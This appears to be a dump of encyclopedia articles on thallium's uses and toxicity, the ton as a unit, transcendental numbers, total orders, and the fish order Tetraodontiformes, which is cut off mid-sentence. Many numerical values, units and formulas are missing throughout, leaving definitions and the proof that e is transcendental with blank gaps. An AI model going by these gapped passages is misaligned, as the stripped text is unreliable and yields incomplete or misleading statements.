mercury-doped thallium-cuprate superconductors have transition temperatures above 130 K at ambient pressure, nearly as high as the world-record-holding mercury cuprates. Nuclear medicine Before the widespread application of technetium-99m in nuclear medicine, the radioactive isotope thallium-201, with a half-life of 73 hours, was the main substance for nuclear cardiography. The nuclide is still used for stress tests for risk stratification in patients with coronary artery disease (CAD). This isotope of thallium can be generated using a transportable generator, which is similar to the technetium-99m generator. The generator contains lead-201 (half-life 9.33 hours), which decays by electron capture to thallium-201. The lead-201 can be produced in a cyclotron by the bombardment of thallium with protons or deuterons by the (p,3n) and (d,4n) reactions. Thallium stress test A thallium stress test is a form of scintigraphy in which the amount of thallium in tissues correlates with tissue blood supply. Viable cardiac cells have normal Na+/K+ ion-exchange pumps. The Tl+ cation binds the K+ pumps and is transported into the cells. Exercise or dipyridamole induces widening (vasodilation) of arteries in the body. This produces coronary steal by areas where arteries are maximally dilated. Areas of infarct or ischemic tissue will remain "cold". Pre- and post-stress thallium may indicate areas that will benefit from myocardial revascularization. Redistribution indicates the existence of coronary steal and the presence of ischemic coronary artery disease. Other uses A mercury–thallium alloy, which forms a eutectic at 8.5% thallium, is reported to freeze at −60 °C, some 20 °C below the freezing point of mercury. This alloy is used in thermometers and low-temperature switches. In organic synthesis, thallium(III) salts, as thallium trinitrate or triacetate, are useful reagents for performing different transformations in aromatics, ketones and olefins, among others. Thallium is a constituent of the alloy in the anode plates of magnesium seawater batteries. Soluble thallium salts are added to gold plating baths to increase the speed of plating and to reduce grain size within the gold layer. A saturated solution of equal parts of thallium(I) formate (Tl(HCO2)) and thallium(I) malonate (Tl(C3H3O4)) in water is known as Clerici solution. It is a mobile, odorless liquid which changes from yellowish to colorless upon reducing the concentration of the thallium salts. With a density of 4.25 g/cm3 at 20 °C, Clerici solution is one of the heaviest aqueous solutions known. It was used in the 20th century for measuring the density of minerals by the flotation method, but its use has discontinued due to the high toxicity and corrosiveness of the solution. Thallium iodide is frequently used as an additive in metal-halide lamps, often together with one or two halides of other metals. It allows optimization of the lamp temperature and color rendering, and shifts the spectral output to the green region, which is useful for underwater lighting. Toxicity Thallium and its compounds are extremely toxic, with numerous recorded cases of fatal thallium poisoning. The Occupational Safety and Health Administration (OSHA) has set the legal limit (permissible exposure limit) for thallium exposure in the workplace as 0.1 mg/m2 skin exposure over an eight-hour workday. The National Institute for Occupational Safety and Health (NIOSH) also set a recommended exposure limit (REL) of 0.1 mg/m2 skin exposure over an eight-hour workday. At levels of 15 mg/m2, thallium is immediately dangerous to life and health. Contact with skin is dangerous, and adequate ventilation is necessary when melting this metal. Thallium(I) compounds have a high aqueous solubility and are readily absorbed through the skin, and care should be taken to avoid this route of exposure, as cutaneous absorption can exceed the absorbed dose received by inhalation at the permissible exposure limit (PEL). Exposure by inhalation cannot safely exceed 0.1 mg/m2 in an eight-hour time-weighted average (40-hour work week). The Centers for Disease Control and Prevention (CDC) states, "Thallium is not classifiable as a carcinogen, and it is not suspected to be a carcinogen. It is unknown whether chronic or repeated exposure to thallium increases the risk of reproductive toxicity or developmental toxicity. Chronic high level exposure to thallium through inhalation has been reported to cause nervous system effects, such as numbness of fingers and toes." For a long time thallium compounds were readily available as rat poison. This fact and that it is water-soluble and nearly tasteless led to frequent intoxication caused by accident or criminal intent. One of the main methods of removing thallium (both radioactive and stable) from humans is to use Prussian blue, a material which absorbs thallium. Up to 20 grams per day of Prussian blue is fed by mouth to the patient, and it passes through their digestive system and comes out in their stool. Hemodialysis and hemoperfusion are also used to remove thallium from the blood serum. At later stages of the treatment, additional potassium is used to mobilize thallium from the tissues. According to the United States Environmental Protection Agency (EPA), artificially-made sources of thallium pollution include gaseous emission of cement factories, coal-burning power plants, and metal sewers. The main source of elevated thallium concentrations in water is the leaching of thallium from ore processing operations.
Physical sciences
Chemical elements_2
null
30318
https://en.wikipedia.org/wiki/Ton
Ton
Ton is any of several units of measure of mass, volume or force. It has a long history and has acquired several meanings and uses. As a unit of mass, ton can mean: the long ton, which is the tonne, also called the metric ton, which is ) or 1 megagram. the short ton, which is Its original use as a unit of volume has continued in the capacity of cargo ships and in units such as the freight ton and a number of other units, ranging from in size. Recent specialized uses include the ton as a means of truck classification. It can also be used as a unit of energy, or in refrigeration as a unit of power, sometimes called a ton of refrigeration. Because the ton (of any system of measuring weight) is usually the heaviest unit named in colloquial speech, its name also has figurative uses, singular and plural, informally meaning a large amount or quantity, or to a great degree, as in "There's a ton of bees in this hive," "We have tons of homework," and "I love you a ton." History The ton is derived from the tun, the term applied to a cask of the largest capacity. This could contain a volume between , which could weigh around and occupy some of space. Units of mass/weight There are several similar units of mass or volume called the ton: The difference between the short ton and the other common forms ("long" and "metric") is about 10%, while the metric and long tons differ by less than 2%. The metric tonne is usually distinguished by its spelling when written, but in the United States and United Kingdom, it is pronounced the same as ton, hence is often spoken as "metric ton" when it is necessary to make the distinction. In the United Kingdom the final "e" of "tonne" can also be pronounced (). In Australia, it is pronounced . In Ireland and most members of the Commonwealth of Nations, a ton is defined as . In the United States and Canada, a ton is defined as . Other units of mass/weight Deadweight ton (abbreviation 'DWT' or 'dwt') is a measure of a ship's carrying capacity, including bunker oil, fresh water, ballast water, crew, and provisions. It is expressed in tonnes () or long tons (). This measurement is also used in the U.S. tonnage of naval ships. Increasingly, tonnes are being used rather than long tons in measuring the displacement of ships. Harbour ton, used in South Africa in the 20th century, was equivalent to () or 1 short ton. Assay ton (abbreviation 'AT') is not a unit of measurement but a standard quantity used in assaying ores of precious metals. A short assay ton is approximately and a long assay ton is approximately . These amounts bear the same ratio to a milligram as a short or long ton bears to a troy ounce. Therefore, the number of milligrams of a particular metal found in a sample weighing one assay ton gives the number of troy ounces of metal contained in a ton of ore. In documents that predate 1960 the word ton is sometimes spelled tonne, but in more recent documents tonne refers exclusively to the metric ton. In nuclear power plants tHM and MTHM mean tonnes of heavy metals, and MTU means tonnes of uranium. In the steel industry, the abbreviation THM means 'tons/tonnes hot metal', which refers to the amount of liquid iron or steel that is produced, particularly in the context of blast furnace production or specific consumption. Subdivisions Both the UK definition of long ton and US definition of short ton have similar underlying bases. Each is equivalent to 20 hundredweight; however, they are long or short hundredweight , respectively. Before the 20th century there were several definitions. Prior to the 15th century in England, the ton was 20 hundredweight, each of 108 lb, giving a ton of . In the 19th century in different parts of Britain, definitions of 2,240, or 2,352, or 2,400 lb were used, with 2,000 lb for explosives; the legal ton was usually 2,240 lb. In the United Kingdom, Canada, Australia, and other areas that had used the imperial system, the tonne is the form of ton legal in trade. Units of volume The displacement, essentially the weight, of a ship is traditionally expressed in long tons. To simplify measurement it is determined by measuring the volume, rather than weight, of water displaced, and calculating the weight from the volume and density. For practical purposes the displacement ton (DT) is a unit of volume, , the approximate volume occupied by one ton of seawater (the actual volume varies with salinity and temperature). It is slightly less than the 224 imperial gallons (1.018 m3) of the water ton (based on distilled water). One measurement ton or freight ton is equal to , but historically it has had several different definitions. It is used to determine the amount of money to be charged in loading, unloading, or carrying different sorts of cargo. In general if a cargo is heavier than salt water, the actual weight is used. If it is lighter than salt water, e.g. feathers, freight is calculated in measurement tons of 40 cubic feet. Gross tonnage and net tonnage are volumetric measures of the cargo-carrying capacity of a ship. The Panama Canal/Universal Measurement System (PC/UMS) is based on net tonnage, modified for Panama Canal billing purposes. PC/UMS is based on a mathematical formula to calculate a vessel's total volume; a PC/UMS net ton is equivalent to 100 cubic feet of capacity. The water ton is used chiefly in Great Britain, in statistics dealing with petroleum products, and is defined as , the volume occupied by of water under the conditions that define the imperial gallon. Units of energy and power Ton of TNT A ton of TNT or tonne of TNT is a unit of energy equal to 109 (thermochemical) calories, also known as a gigacalorie (Gcal), equal to 4.184 gigajoules (GJ). A kiloton of TNT or kilotonne of TNT is a unit of energy equal to 1012 calories, also known as a teracalorie (Tcal), equal to 4.184 terajoules (TJ). A megaton of TNT (1,000,000 tonnes) or megatonne of TNT is a unit of energy equal to 1015 calories, also known (infrequently) as a petacalorie (Pcal), equal to 4.184 petajoules (PJ). These are small calories (cal). The large or dietary calorie (Cal) is equal to one kilocalorie (kcal), and is gradually being replaced by the latter correct term. Early values for the explosive energy released by trinitrotoluene (TNT) ranged from 900 to 1100 calories per gram. In order to standardise the use of the term TNT as a unit of energy, an arbitrary value was assigned based on 1,000 calories () per gram. Thus there is no longer a direct connection to the chemical TNT itself. It is now merely a unit of energy that happens to be expressed using words normally associated with mass (e.g., kilogram, tonne, pound). The definition applies for both spellings: ton of TNT and tonne of TNT. Measurements in tons of TNT have been used primarily to express nuclear weapon yields, though they have also been used since in seismology as well. Tonne of oil equivalent A tonne of oil equivalent (toe), sometimes ton of oil equivalent, is a conventional value, based on the amount of energy released by burning one tonne of crude oil. The unit is used, for example, by the International Energy Agency (IEA), for the reported world energy consumption as TPES in millions of toe (Mtoe). Other sources convert 1 toe into 1.28 tonne of coal equivalent (tce). 1 toe is also standardized as 7.33 barrel of oil equivalent (boe). Tonne of coal equivalent A tonne of coal equivalent (tce), sometimes ton of coal equivalent, is a conventional value, based on the amount of energy released by burning one tonne of coal. Plural name is tonnes of coal equivalent. Per the World Coal Association: 1 tonne of coal equivalent (tce) corresponds to 0.697 tonne of oil equivalent (toe) Per the International Energy Agency 1 tonne of coal equivalent (tce) corresponds to 0.700 tonne of oil equivalent (toe) Refrigeration The unit ton is used in refrigeration and air conditioning to measure the rate of heat absorption. Prior to the introduction of mechanical refrigeration, cooling was accomplished by delivering ice. Installing one ton of mechanical refrigeration capacity replaced the daily delivery of one ton of ice. In North America, a standard ton of refrigeration is . "The heat absorption per day is approximately the heat of fusion of 1 ton of ice at ." This is approximately the power required to melt one short ton () of ice at in 24 hours, thus representing the delivery of of ice per day. A less common usage is the power required to cool 1 long ton ( = ) of water by every 10 minutes = . The refrigeration ton is commonly abbreviated as RT. Colloquial English Ton is also used informally, often as slang, to mean a large amount of something. In Britain, a ton is colloquially used to refer to 100 of a given unit. Ton can thus refer to a speed of 100 miles per hour, and is prefixed by an indefinite article, e.g. "Lee was doing a ton down the motorway"; to money e.g. "How much did you pay for that?" "A ton" (£100); to 100 points in a game e.g. "Eric just threw a ton in our darts game" (in some games, e.g. cricket, more commonly called a century); or to a hundred of any other countable figure.
Physical sciences
Mass
null
30325
https://en.wikipedia.org/wiki/Transcendental%20number
Transcendental number
In mathematics, a transcendental number is a real or complex number that is not algebraic: that is, not the root of a non-zero polynomial with integer (or, equivalently, rational) coefficients. The best-known transcendental numbers are and . The quality of a number being transcendental is called transcendence. Though only a few classes of transcendental numbers are known, partly because it can be extremely difficult to show that a given number is transcendental, transcendental numbers are not rare: indeed, almost all real and complex numbers are transcendental, since the algebraic numbers form a countable set, while the set of real numbers and the set of complex numbers are both uncountable sets, and therefore larger than any countable set. All transcendental real numbers (also known as real transcendental numbers or transcendental irrational numbers) are irrational numbers, since all rational numbers are algebraic. The converse is not true: Not all irrational numbers are transcendental. Hence, the set of real numbers consists of non-overlapping sets of rational, algebraic irrational, and transcendental real numbers. For example, the square root of 2 is an irrational number, but it is not a transcendental number as it is a root of the polynomial equation . The golden ratio (denoted or ) is another irrational number that is not transcendental, as it is a root of the polynomial equation . History The name "transcendental" comes , and was first used for the mathematical concept in Leibniz's 1682 paper in which he proved that is not an algebraic function of . Euler, in the eighteenth century, was probably the first person to define transcendental numbers in the modern sense. Johann Heinrich Lambert conjectured that and were both transcendental numbers in his 1768 paper proving the number is irrational, and proposed a tentative sketch proof that is transcendental. Joseph Liouville first proved the existence of transcendental numbers in 1844, and in 1851 gave the first decimal examples such as the Liouville constant in which the th digit after the decimal point is if is equal to ( factorial) for some and otherwise. In other words, the th digit of this number is 1 only if is one of the numbers , etc. Liouville showed that this number belongs to a class of transcendental numbers that can be more closely approximated by rational numbers than can any irrational algebraic number, and this class of numbers is called the Liouville numbers, named in his honour. Liouville showed that all Liouville numbers are transcendental. The first number to be proven transcendental without having been specifically constructed for the purpose of proving transcendental numbers' existence was , by Charles Hermite in 1873. In 1874 Georg Cantor proved that the algebraic numbers are countable and the real numbers are uncountable. He also gave a new method for constructing transcendental numbers. Although this was already implied by his proof of the countability of the algebraic numbers, Cantor also published a construction that proves there are as many transcendental numbers as there are real numbers. Cantor's work established the ubiquity of transcendental numbers. In 1882 Ferdinand von Lindemann published the first complete proof that is transcendental. He first proved that is transcendental if is a non-zero algebraic number. Then, since is algebraic (see Euler's identity), must be transcendental. But since is algebraic, must therefore be transcendental. This approach was generalized by Karl Weierstrass to what is now known as the Lindemann–Weierstrass theorem. The transcendence of implies that geometric constructions involving compass and straightedge only cannot produce certain results, for example squaring the circle. In 1900 David Hilbert posed a question about transcendental numbers, Hilbert's seventh problem: If is an algebraic number that is not zero or one, and is an irrational algebraic number, is necessarily transcendental? The affirmative answer was provided in 1934 by the Gelfond–Schneider theorem. This work was extended by Alan Baker in the 1960s in his work on lower bounds for linear forms in any number of logarithms (of algebraic numbers). Properties A transcendental number is a (possibly complex) number that is not the root of any integer polynomial. Every real transcendental number must also be irrational, since a rational number is the root of an integer polynomial of degree one. The set of transcendental numbers is uncountably infinite. Since the polynomials with rational coefficients are countable, and since each such polynomial has a finite number of zeroes, the algebraic numbers must also be countable. However, Cantor's diagonal argument proves that the real numbers (and therefore also the complex numbers) are uncountable. Since the real numbers are the union of algebraic and transcendental numbers, it is impossible for both subsets to be countable. This makes the transcendental numbers uncountable. No rational number is transcendental and all real transcendental numbers are irrational. The irrational numbers contain all the real transcendental numbers and a subset of the algebraic numbers, including the quadratic irrationals and other forms of algebraic irrationals. Applying any non-constant single-variable algebraic function to a transcendental argument yields a transcendental value. For example, from knowing that is transcendental, it can be immediately deduced that numbers such as , , , and are transcendental as well. However, an algebraic function of several variables may yield an algebraic number when applied to transcendental numbers if these numbers are not algebraically independent. For example, and are both transcendental, but is obviously not. It is unknown whether , for example, is transcendental, though at least one of and must be transcendental. More generally, for any two transcendental numbers and , at least one of and must be transcendental. To see this, consider the polynomial  . If and were both algebraic, then this would be a polynomial with algebraic coefficients. Because algebraic numbers form an algebraically closed field, this would imply that the roots of the polynomial, and , must be algebraic. But this is a contradiction, and thus it must be the case that at least one of the coefficients is transcendental. The non-computable numbers are a strict subset of the transcendental numbers. All Liouville numbers are transcendental, but not vice versa. Any Liouville number must have unbounded partial quotients in its simple continued fraction expansion. Using a counting argument one can show that there exist transcendental numbers which have bounded partial quotients and hence are not Liouville numbers. Using the explicit continued fraction expansion of , one can show that is not a Liouville number (although the partial quotients in its continued fraction expansion are unbounded). Kurt Mahler showed in 1953 that is also not a Liouville number. It is conjectured that all infinite continued fractions with bounded terms, that have a "simple" structure, and that are not eventually periodic are transcendental (in other words, algebraic irrational roots of at least third degree polynomials do not have apparent pattern in their continued fraction expansions, since eventually periodic continued fractions correspond to quadratic irrationals, see Hermite's problem). Numbers proven to be transcendental Numbers proven to be transcendental: (by the Lindemann–Weierstrass theorem). if is algebraic and nonzero (by the Lindemann–Weierstrass theorem), in particular Euler's number . where is a positive integer; in particular Gelfond's constant (by the Gelfond–Schneider theorem). Algebraic combinations of and such as and (following from their algebraic independence). where is algebraic but not 0 or 1, and is irrational algebraic, in particular the Gelfond–Schneider constant (by the Gelfond–Schneider theorem). The natural logarithm if is algebraic and not equal to 0 or 1, for any branch of the logarithm function (by the Lindemann–Weierstrass theorem). if and are positive integers not both powers of the same integer, and is not equal to 1 (by the Gelfond–Schneider theorem). All numbers of the form are transcendental, where are algebraic for all and are non-zero algebraic for all (by Baker's theorem). The trigonometric functions and their hyperbolic counterparts, for any nonzero algebraic number , expressed in radians (by the Lindemann–Weierstrass theorem). Non-zero results of the inverse trigonometric functions and their hyperbolic counterparts, for any algebraic number (by the Lindemann–Weierstrass theorem). , for rational such that . The fixed point of the cosine function (also referred to as the Dottie number ) – the unique real solution to the equation , where is in radians (by the Lindemann–Weierstrass theorem). if is algebraic and nonzero, for any branch of the Lambert W Function (by the Lindemann–Weierstrass theorem), in particular the omega constant . if both and the order are algebraic such that , for any branch of the generalized Lambert W function. , the square super-root of any natural number is either an integer or transcendental (by the Gelfond–Schneider theorem). Values of the gamma function of rational numbers that are of the form or . Algebraic combinations of and or of and such as the lemniscate constant (following from their respective algebraic independences). The values of Beta function if and are non-integer rational numbers. The Bessel function of the first kind , its first derivative, and the quotient are transcendental when is rational and is algebraic and nonzero, and all nonzero roots of and are transcendental when is rational. The number , where and are Bessel functions and is the Euler–Mascheroni constant. Any Liouville number, in particular: Liouville's constant. Numbers with large irrationality measure, such as the Champernowne constant (by Roth's theorem). Numbers artificially constructed not to be algebraic periods. Any non-computable number, in particular: Chaitin's constant. Constructed irrational numbers which are not simply normal in any base. Any number for which the digits with respect to some fixed base form a Sturmian word. The Prouhet–Thue–Morse constant and the related rabbit constant. The Komornik–Loreti constant. The paperfolding constant (also named as "Gaussian Liouville number"). The values of the infinite series with fast convergence rate as defined by Y. Gao and J. Gao, such as . Numbers of the form and For where is the floor function. Any number of the form (where , are polynomials in variables and , is algebraic and , is any integer greater than 1). The numbers and with only two different decimal digits whose nonzero digit positions are given by the Moser–de Bruijn sequence and its double. The values of the Rogers-Ramanujan continued fraction where is algebraic and . The lemniscatic values of theta function (under the same conditions for ) are also transcendental. where is algebraic but not imaginary quadratic (i.e, the exceptional set of this function is the number field whose degree of extension over is 2). The constants and in the formula for first index of occurrence of Gijswijt's sequence, where k is any integer greater than 1. Conjectured transcendental numbers Numbers which have yet to be proven to be either transcendental or algebraic: Most nontrivial combinations of two or more transcendental numbers are themselves not known to be transcendental or even irrational: , , , , , , . It has been shown that both and do not satisfy any polynomial equation of degree and integer coefficients of average size 109. At least one of the numbers and is transcendental. Schanuel's conjecture would imply that all of the above numbers are transcendental and algebraically independent. The Euler–Mascheroni constant : In 2010 it has been shown that an infinite list of Euler-Lehmer constants (which includes ) contains at most one algebraic number. In 2012 it was shown that at least one of and the Gompertz constant is transcendental. The values of the Riemann zeta function at odd positive integers ; in particular Apéry's constant , which is known to be irrational. For the other numbers even this is not known. The values of the Dirichlet beta function at even positive integers ; in particular Catalan's Constant . (none of them are known to be irrational). Values of the Gamma Function for positive integers and are not known to be irrational, let alone transcendental. For at least one the numbers and is transcendental. Any number given by some kind of limit that is not obviously algebraic. Proofs for specific numbers A proof that is transcendental The first proof that the base of the natural logarithms, , is transcendental dates from 1873. We will now follow the strategy of David Hilbert (1862–1943) who gave a simplification of the original proof of Charles Hermite. The idea is the following: Assume, for purpose of finding a contradiction, that is algebraic. Then there exists a finite set of integer coefficients satisfying the equation: It is difficult to make use of the integer status of these coefficients when multiplied by a power of the irrational , but we can absorb those powers into an integral which “mostly” will assume integer values. For a positive integer , define the polynomial and multiply both sides of the above equation by to arrive at the equation: By splitting respective domains of integration, this equation can be written in the form where Here will turn out to be an integer, but more importantly it grows quickly with . Lemma 1 There are arbitrarily large such that is a non-zero integer. Proof. Recall the standard integral (case of the Gamma function) valid for any natural number . More generally, if then . This would allow us to compute exactly, because any term of can be rewritten as through a change of variables. Hence That latter sum is a polynomial in with integer coefficients, i.e., it is a linear combination of powers with integer coefficients. Hence the number is a linear combination (with those same integer coefficients) of factorials ; in particular is an integer. Smaller factorials divide larger factorials, so the smallest occurring in that linear combination will also divide the whole of . We get that from the lowest power term appearing with a nonzero coefficient in , but this smallest exponent is also the multiplicity of as a root of this polynomial. is chosen to have multiplicity of the root and multiplicity of the roots for , so that smallest exponent is for and for with . Therefore divides . To establish the last claim in the lemma, that is nonzero, it is sufficient to prove that does not divide . To that end, let be any prime larger than and . We know from the above that divides each of for , so in particular all of those are divisible by . It comes down to the first term . We have (see falling and rising factorials) and those higher degree terms all give rise to factorials or larger. Hence That right hand side is a product of nonzero integer factors less than the prime , therefore that product is not divisible by , and the same holds for ; in particular cannot be zero. Lemma 2 For sufficiently large , . Proof. Note that where are continuous functions of for all , so are bounded on the interval . That is, there are constants such that So each of those integrals composing is bounded, the worst case being It is now possible to bound the sum as well: where is a constant not depending on . It follows that finishing the proof of this lemma. Conclusion Choosing a value of that satisfies both lemmas leads to a non-zero integer added to a vanishingly small quantity being equal to zero: an impossibility. It follows that the original assumption, that can satisfy a polynomial equation with integer coefficients, is also impossible; that is, is transcendental. The transcendence of A similar strategy, different from Lindemann's original approach, can be used to show that the number is transcendental. Besides the gamma-function and some estimates as in the proof for , facts about symmetric polynomials play a vital role in the proof. For detailed information concerning the proofs of the transcendence of and , see the references and external links.
Mathematics
Basics
null
30330
https://en.wikipedia.org/wiki/Total%20order
Total order
In mathematics, a total order or linear order is a partial order in which any two elements are comparable. That is, a total order is a binary relation on some set , which satisfies the following for all and in : (reflexive). If and then (transitive). If and then (antisymmetric). or (strongly connected, formerly called total). Reflexivity (1.) already follows from connectedness (4.), but is required explicitly by many authors nevertheless, to indicate the kinship to partial orders. Total orders are sometimes also called simple, connex, or full orders. A set equipped with a total order is a totally ordered set; the terms simply ordered set, linearly ordered set, toset and loset are also used. The term chain is sometimes defined as a synonym of totally ordered set, but generally refers to a totally ordered subset of a given partially ordered set. An extension of a given partial order to a total order is called a linear extension of that partial order. Strict and non-strict total orders A on a set is a strict partial order on in which any two distinct elements are comparable. That is, a strict total order is a binary relation on some set , which satisfies the following for all and in : Not (irreflexive). If then not (asymmetric). If and then (transitive). If , then or (connected). Asymmetry follows from transitivity and irreflexivity; moreover, irreflexivity follows from asymmetry. For delimitation purposes, a total order as defined above is sometimes called non-strict order. For each (non-strict) total order there is an associated relation , called the strict total order associated with that can be defined in two equivalent ways: if and (reflexive reduction). if not (i.e., is the complement of the converse of ). Conversely, the reflexive closure of a strict total order is a (non-strict) total order. Examples Any subset of a totally ordered set is totally ordered for the restriction of the order on . The unique order on the empty set, , is a total order. Any set of cardinal numbers or ordinal numbers (more strongly, these are well-orders). If is any set and an injective function from to a totally ordered set then induces a total ordering on by setting if and only if . The lexicographical order on the Cartesian product of a family of totally ordered sets, indexed by a well ordered set, is itself a total order. The set of real numbers ordered by the usual "less than or equal to" (≤) or "greater than or equal to" (≥) relations is totally ordered. Hence each subset of the real numbers is totally ordered, such as the natural numbers, integers, and rational numbers. Each of these can be shown to be the unique (up to an order isomorphism) "initial example" of a totally ordered set with a certain property, (here, a total order is initial for a property, if, whenever has the property, there is an order isomorphism from to a subset of ): The natural numbers form an initial non-empty totally ordered set with no upper bound. The integers form an initial non-empty totally ordered set with neither an upper nor a lower bound. The rational numbers form an initial totally ordered set which is dense in the real numbers. Moreover, the reflexive reduction < is a dense order on the rational numbers. The real numbers form an initial unbounded totally ordered set that is connected in the order topology (defined below). Ordered fields are totally ordered by definition. They include the rational numbers and the real numbers. Every ordered field contains an ordered subfield that is isomorphic to the rational numbers. Any Dedekind-complete ordered field is isomorphic to the real numbers. The letters of the alphabet ordered by the standard dictionary order, e.g., etc., is a strict total order. Chains The term chain is sometimes defined as a synonym for a totally ordered set, but it is generally used for referring to a subset of a partially ordered set that is totally ordered for the induced order. Typically, the partially ordered set is a set of subsets of a given set that is ordered by inclusion, and the term is used for stating properties of the set of the chains. This high number of nested levels of sets explains the usefulness of the term. A common example of the use of chain for referring to totally ordered subsets is Zorn's lemma which asserts that, if every chain in a partially ordered set has an upper bound in , then contains at least one maximal element. Zorn's lemma is commonly used with being a set of subsets; in this case, the upper bound is obtained by proving that the union of the elements of a chain in is in . This is the way that is generally used to prove that a vector space has Hamel bases and that a ring has maximal ideals. In some contexts, the chains that are considered are order isomorphic to the natural numbers with their usual order or its opposite order. In this case, a chain can be identified with a monotone sequence, and is called an ascending chain or a descending chain, depending whether the sequence is increasing or decreasing. A partially ordered set has the descending chain condition if every descending chain eventually stabilizes. For example, an order is well founded if it has the descending chain condition. Similarly, the ascending chain condition means that every ascending chain eventually stabilizes. For example, a Noetherian ring is a ring whose ideals satisfy the ascending chain condition. In other contexts, only chains that are finite sets are considered. In this case, one talks of a finite chain, often shortened as a chain. In this case, the length of a chain is the number of inequalities (or set inclusions) between consecutive elements of the chain; that is, the number minus one of elements in the chain. Thus a singleton set is a chain of length zero, and an ordered pair is a chain of length one. The dimension of a space is often defined or characterized as the maximal length of chains of subspaces. For example, the dimension of a vector space is the maximal length of chains of linear subspaces, and the Krull dimension of a commutative ring is the maximal length of chains of prime ideals. "Chain" may also be used for some totally ordered subsets of structures that are not partially ordered sets. An example is given by regular chains of polynomials. Another example is the use of "chain" as a synonym for a walk in a graph. Further concepts Lattice theory One may define a totally ordered set as a particular kind of lattice, namely one in which we have for all a, b. We then write a ≤ b if and only if . Hence a totally ordered set is a distributive lattice. Finite total orders A simple counting argument will verify that any non-empty finite totally ordered set (and hence any non-empty subset thereof) has a least element. Thus every finite total order is in fact a well order. Either by direct proof or by observing that every well order is order isomorphic to an ordinal one may show that every finite total order is order isomorphic to an initial segment of the natural numbers ordered by <. In other words, a total order on a set with k elements induces a bijection with the first k natural numbers. Hence it is common to index finite total orders or well orders with order type ω by natural numbers in a fashion which respects the ordering (either starting with zero or with one). Category theory Totally ordered sets form a full subcategory of the category of partially ordered sets, with the morphisms being maps which respect the orders, i.e. maps f such that if a ≤ b then f(a) ≤ f(b). A bijective map between two totally ordered sets that respects the two orders is an isomorphism in this category. Order topology For any totally ordered set we can define the open intervals , , , and . We can use these open intervals to define a topology on any ordered set, the order topology. When more than one order is being used on a set one talks about the order topology induced by a particular order. For instance if N is the natural numbers, is less than and greater than we might refer to the order topology on N induced by and the order topology on N induced by (in this case they happen to be identical but will not in general). The order topology induced by a total order may be shown to be hereditarily normal. Completeness A totally ordered set is said to be complete if every nonempty subset that has an upper bound, has a least upper bound. For example, the set of real numbers R is complete but the set of rational numbers Q is not. In other words, the various concepts of completeness (not to be confused with being "total") do not carry over to restrictions. For example, over the real numbers a property of the relation is that every non-empty subset S of R with an upper bound in R has a least upper bound (also called supremum) in R. However, for the rational numbers this supremum is not necessarily rational, so the same property does not hold on the restriction of the relation to the rational numbers. There are a number of results relating properties of the order topology to the completeness of X: If the order topology on X is connected, X is complete. X is connected under the order topology if and only if it is complete and there is no gap in X (a gap is two points a and b in X with a < b such that no c satisfies a < c < b.) X is complete if and only if every bounded set that is closed in the order topology is compact. A totally ordered set (with its order topology) which is a complete lattice is compact. Examples are the closed intervals of real numbers, e.g. the unit interval [0,1], and the affinely extended real number system (extended real number line). There are order-preserving homeomorphisms between these examples. Sums of orders For any two disjoint total orders and , there is a natural order on the set , which is called the sum of the two orders or sometimes just : For , holds if and only if one of the following holds: and and and Intuitively, this means that the elements of the second set are added on top of the elements of the first set. More generally, if is a totally ordered index set, and for each the structure is a linear order, where the sets are pairwise disjoint, then the natural total order on is defined by For , holds if: Either there is some with or there are some in with , Decidability The first-order theory of total orders is decidable, i.e. there is an algorithm for deciding which first-order statements hold for all total orders. Using interpretability in S2S, the monadic second-order theory of countable total orders is also decidable. Orders on the Cartesian product of totally ordered sets There are several ways to take two totally ordered sets and extend to an order on the Cartesian product, though the resulting order may only be partial. Here are three of these possible orders, listed such that each order is stronger than the next: Lexicographical order: (a,b) ≤ (c,d) if and only if a < c or (a = c and b ≤ d). This is a total order. (a,b) ≤ (c,d) if and only if a ≤ c and b ≤ d (the product order). This is a partial order. (a,b) ≤ (c,d) if and only if (a < c and b < d) or (a = c and b = d) (the reflexive closure of the direct product of the corresponding strict total orders). This is also a partial order. Each of these orders extends the next in the sense that if we have x ≤ y in the product order, this relation also holds in the lexicographic order, and so on. All three can similarly be defined for the Cartesian product of more than two sets. Applied to the vector space Rn, each of these make it an ordered vector space.
Mathematics
Order theory
null
30333
https://en.wikipedia.org/wiki/Tetraodontiformes
Tetraodontiformes
Tetraodontiformes (), also known as the Plectognathi, is an order of ray-finned fishes which includes the pufferfishes and related taxa. This order has been classified as a suborder of the order Perciformes, although recent studies have found that it, as the Tetraodontoidei, is a sister taxon to the anglerfish order Lophiiformes, called Lophiodei, and have placed both taxa within the Acanthuriformes. The Tetraodontiformes are represented by 10 extant families and at around 430 species overall. The majority of the species within this order are marine but a few may be found in freshwater. They are found throughout the world. Taxonomy Tetraodontiformes is a name first used for this order in 1940 by Lev Berg, the order was originally proposed in 1817 as the "Les Plectognathes", the Plectognathi. Cuvier divided this into two families "Les Gymnodontes" and "Les Sclerodermes". In 1940 Berg first used the term Tetraodontiformes for this order and this name is the currently accepted name as it follows the International Code of Zoological Nomenclature rule that a name for a family or higher taxa must have its root based on the type species of that grouping. In this case the type species is Tetraodon lineatus Linnaeus, 1758. The 5th edition of Fishes of the World recognises the order as a derived order within the Actinopterygii and as a monophyletic order within the Percomorpha. Other authorities have proposed that it is not an order but that it is a clade, the Tetraodontoidei, within the order Acanthuriformes and is most closely related to the Lophiodei, the anglerfishes. Etymology Tetraodontiformes suffixes -iformes, meaning "in the form of", onto the genus name, Tetraodon, of the type species of Tetraodontidae, the best known and most widely distributed family in the order. Tetraodon means "four tooth" and alludes to the four fused teeth, separated by a central suture, in the jaws. Evolution The oldest tetraodontiforms are the extinct suborder Plectocretacicoidei from the Late Cretaceous (Santonian to Campanian) of Italy and Slovenia, both in the former Tethyan region. These comprise the families Cretatriacanthidae and Protriacanthidae. Plectocretacicus from the Cenomanian of Lebanon has also been proposed as a tetraodontiform, but this has been more recently questioned. Description Tetraodontiformes include a variety of body shapes, all radical departures from the streamlined body plan typical of most fishes. These forms range from nearly square or triangular (boxfishes), globose (pufferfishes) to laterally compressed (filefishes and triggerfishes). They range in size from Rudarius excelsus (a filefish), measuring just in length, to the ocean sunfish, the largest of all bony fishes at up to in length and weighing over 2 tonnes. Most members of this order – except for the family Balistidae – are ostraciiform swimmers, meaning the body is rigid and incapable of lateral flexure. Because of this, they are slow-moving and rely on their pectoral, dorsal, anal, and caudal fins for propulsion rather than body undulation. However, movement is usually quite precise; dorsal and anal fins aid in manoeuvring and stabilizing. In most species, all fins are simple, small, and rounded, except for the pelvic fins which, if present, are fused and buried. Again, in most members, the gill plates are covered 